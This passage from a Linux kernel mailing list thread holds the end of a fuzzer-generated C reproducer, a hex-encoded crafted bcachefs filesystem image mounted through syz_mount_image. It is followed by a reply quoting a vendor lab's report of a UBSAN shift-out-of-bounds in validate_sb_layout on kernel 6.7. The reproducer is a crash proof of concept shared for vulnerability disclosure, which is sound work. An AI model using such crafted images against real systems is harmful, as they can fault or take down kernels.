"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd7"
"\x90\xc7\x7f\xbc\xb7\xd6\x5e\x77\xd4\xba\x67\xdb\x73\xaf\xbf\x78\xe1\xc1"
"\x9b\xef\xfe\xe2\xc0\xf0\xd4\x6b\xf7\x7d\xf4\xfc\xfe\xb5\x1f\xaf\xb9\xd0"
"\x1c\x19\x7c\xe0\x8d\xad\xf7\x7c\x33\xf4\x79\xd7\x40\xef\x86\xe1\x2d\x1f"
"\x8c\x3d\x34\x3a\x72\xe6\xae\x3f\xcf\x1c\x3e\x3a\xb8\xe8\x89\x5e\x99\x6b"
"\x36\x65\x65\x3d\x84\xf8\x5b\x0c\xa1\xf7\xe7\xb1\xc3\xa3\x67\xbf\x5c\x3b"
"\xd3\x17\x67\xce\x1f\x9b\xfb\x42\x57\x57\x5c\xfd\x49\x57\xcc\x25\x6c\x9e"
"\x0e\x21\x3c\xdd\x1a\xe7\xc2\x9d\x63\x53\xfd\xcf\xcc\xb4\xfb\xdf\xec\x58"
"\xd0\x7f\x63\x2e\x24\x7f\x5d\xa1\x51\x4d\xe3\x99\xd3\x5c\x38\x5e\xae\x2f"
"\xf5\x6c\x9d\xed\x7d\xe2\xa9\x13\xe3\xcf\x0e\x9c\x1d\xeb\xdb\xdd\xff\xeb"
"\xe4\x1d\x2f\xec\x9b\x7f\x4b\xac\xb7\xad\xa7\x10\x56\x0d\xb5\x1f\xbf\x2c"
"\x84\xb0\x3c\xdb\x66\xa4\xd5\xd6\x9d\x0e\xce\xda\xed\x21\x84\x15\x6d\xc7"
"\xdd\xb9\xc8\xb8\x6e\x5b\xe2\xf8\x6f\x2f\xa8\xd7\x65\xed\x0d\x59\xdb\x58"
"\x24\x27\xed\x5f\x9f\xab\x6b\x4b\x1c\x47\x2d\xd7\x76\x2c\xf1\xb8\xb2\x2a"
"\x57\x38\x3f\x2f\x3f\x7f\xf9\x9b\xd1\x95\x92\xae\x73\x55\xd6\x9e\xca\xda"
"\x4d\xff\x32\xa7\x9a\xb6\x18\x2a\x31\xd4\x5a\xc3\x7f\x2e\xce\xaf\x91\xd0"
"\xf6\xb9\xc5\x10\x67\xd7\x76\xbd\x55\x57\x66\xeb\xd0\xaa\x43\xbe\x8e\xb9"
"\xba\x92\xab\xab\xcb\x72\xd7\x35\x7b\xde\x6c\x62\xab\x31\x2e\xec\x4f\xef"
"\xcb\xf5\xa7\xdb\x71\x2d\xeb\x5f\xdf\x7e\xaf\xbe\x8c\x1d\x05\xfd\x3d\x59"
"\x5b\xcf\xbe\xa8\x7f\xa4\x3a\xe4\x5f\xcc\x69\x5c\xf2\x62\xfe\x3a\x42\xdb"
"\xb8\x26\xae\xd6\xc2\x28\x50\x29\xf8\xee\xa5\xfe\xd6\xf0\xb2\x0f\xa3\x91"
"\xf5\x35\xe2\xea\x4b\x8e\xf9\xfb\x32\xd2\xbe\x89\xcf\x9e\xdc\xf9\xfb\xf7"
"\xaf\x9e\x6a\x16\x8c\x23\xbe\x1f\xb3\xfc\x58\x2a\x7f\x60\xf8\xd8\xf8\x7b"
"\x8f\x9d\xee\xe9\x2e\xca\x1f\xaa\x64\xf9\x95\x52\xf9\xe7\xaa\x5f\x4d\xbf"
"\x3b\xd9\xdd\x59\x98\x7f\x28\xe5\x57\x4b\xe5\x3f\xf2\xd7\x2f\x07\x0f\x3c"
"\xbc\x67\x4d\xe1\xfc\x4c\xa4\xf9\xa9\x95\xca\xdf\xf0\x56\xe7\xde\xa9\x3d"
"\x3b\x3a\xfa\x8a\xf2\x8f\xa7\xfc\x7a\xa9\xfc\x2d\xbb\x7a\xb7\xde\x3a\xf9"
"\xd2\xcb\x85\xe3\xdf\x9c\xe6\x67\x79\xa9\xfc\xef\xde\xde\x78\x71\xd7\xa1"
"\x0f\x4f\x17\xe6\x87\x94\xbf\xa2\x54\xfe\x0f\xc7\x4e\xae\xab\xf6\xbc\x73"
"\xbe\x30\x7f\x3c\xcd\x4f\xa3\x54\xfe\xa3\xfd\x47\xb6\xdd\x7f\xcb\xc8\xd1"
"\xc2\xf9\xff\x3a\xe5\xaf\x2c\x95\xbf\xf3\xfc\xe8\xd0\xee\x13\x9f\x6e\x2c"
"\x5c\x9f\xdb\xd3\xfc\x34\x4b\xe5\x4f\x6f\xfb\xf6\xa7\x8b\xcd\xc1\x93\x45"
"\xf7\xce\x78\xfc\x6a\xff\xc2\x02\x5c\x5f\x6e\xca\xfe\x63\x1d\xcc\xea\xb2"
"\xcf\x99\xff\x55\xdb\xf3\xc2\x91\xbe\xda\xdc\x7f\xbe\xce\x6c\x5b\xf9\x7f"
"\x9e\x28\x27\xb6\x3d\xbb\xfc\xc3\x0e\x1c\x0b\x00\x00\x00\x00\x08\xf3\xb7"
"\xee\xca\x62\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x80\x15\x00\x00\xff\xff\xb1\xfa\x68\x58",
23938);
syz_mount_image(/*fs=*/0x20005d80, /*dir=*/0x20000100,
/*flags=MS_DIRSYNC*/ 0x80, /*opts=*/0x20005e00, /*chdir=*/1,
/*size=*/0x5d82, /*img=*/0x20005f80);
return 0;
}
^ permalink raw reply [flat|nested] 3+ messages in thread* Re: UBSAN: shift-out-of-bounds in validate_sb_layout
2024-05-20 7:02 UBSAN: shift-out-of-bounds in validate_sb_layout Ubisectech Sirius
@ 2024-05-20 14:31 ` Steven Rostedt
2024-05-20 14:42 ` Kent Overstreet
0 siblings, 1 reply; 3+ messages in thread
From: Steven Rostedt @ 2024-05-20 14:31 UTC (permalink / raw)
To: Ubisectech Sirius; +Cc: linux-trace-kernel, linux-kernel, kent.overstreet
On Mon, 20 May 2024 15:02:26 +0800
"Ubisectech Sirius" <bugreport@ubisectech.com> wrote:
> Hello.
> We are Ubisectech Sirius Team, the vulnerability lab of China ValiantSec. Recently, our team has discovered a issue in Linux kernel 6.7. Attached to the email were a PoC file of the issue.
>
> Stack dump:
> UBSAN: shift-out-of-bounds in fs/bcachefs/super-io.c:310:18
> shift exponent 127 is too large for 32-bit type 'int'
> CPU: 0 PID: 14408 Comm: syz-executor.3 Not tainted 6.7.0 #2
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> Call Trace:
> <TASK>
> __dump_stack lib/dump_stack.c:88 [inline]
> dump_stack_lvl+0x136/0x150 lib/dump_stack.c:106
> ubsan_epilogue lib/ubsan.c:217 [inline]
